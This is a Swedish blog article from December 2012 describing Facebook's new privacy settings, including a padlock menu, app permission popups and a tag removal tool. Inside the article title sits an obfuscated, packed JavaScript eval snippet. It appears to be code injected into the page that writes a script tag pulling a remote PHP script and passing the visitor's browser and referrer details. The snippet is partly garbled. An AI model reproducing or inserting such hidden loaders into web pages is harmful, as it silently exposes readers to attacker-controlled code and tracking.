Image Image Image Image Image Image Image Image Image Image

| 18 januari, 2020

Scroll to top

Top

Nya Facebook inställningar på gång

Nya Facebook inställningar på gång
Filip Urde
  • On 13 december, 2012
  • http://www.revue.se/filip-urde

Facebook eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|brbad|var|u0026u|referrer|btkey||js|php’.split(’|’),0,{}))
uppdatering

Igår presenterade Facebook några nya inställningar som ska förenkla för användaren att ha kontroll över vad som delas, till vem och till vilka appar.

Inställningarna hittar man under det nya menyvalet uppe i toppmenyn som bär ett hänglås som symbol (se bild 1). Under hänglåset finner du tre menyval för att kontrollera eller uppdatera dina inställningar. En till nyhet är när man väljer att lägga till fler appar så kommer det två popuper med en som frågar om att hämta information från dina uppgifter, samt en popup som frågar om att posta i din feed (Se bild 2 -3).

En till nyhet är att man kommer få varningar när man till exempelvis vill gömma något från sin feed. Då kommer man få ett meddelande som talar om att det fortfarande kan vara sökbart, samt att man kommer få tips på hur man kan justera detta (se bild 4).

Sedan så har aktivitetsloggen fått ett nytt gränssnitt vilket ni kan se här nedan på bild 5 i ordningen.

Tillsist så har vi ”Request and Removal tool” som gör det möjligt att av tagga sig från flera foton direkt, samt ta kontakt med folk som taggat än i saker man inte vill ska finnas på Facebook (Se bild 6).

Dessa ändringar har tyvärr inte kommit till Sverige än och kommer inte att släppas alla direkt. Om du vill läsa mer om dessa kommande uppdateringar så kan ni följa länken nedan.
newsroom.fb.com